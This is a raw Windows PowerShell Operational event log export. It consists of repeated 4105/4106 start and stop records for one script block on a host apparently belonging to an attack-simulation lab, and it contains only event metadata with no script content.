OpCode=On create calls
RecordNumber=1473527
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473526
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473525
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473524
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473523
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473522
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473521
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473520
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473519
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473518
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473517
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473516
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473515
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473514
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473513
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473512
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473511
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473510
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473509
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473508
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473507
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473506
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473505
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473504
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473503
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473502
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473501
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473500
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473499
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473498
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473497
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473496
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473495
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473494
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473493
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473492
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473491
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473490
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473489
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473488
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473487
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473486
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473485
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473484
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473483
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473482
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473481
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473480
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473479
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473478
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473477
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473476
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473475
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473474
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473473
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
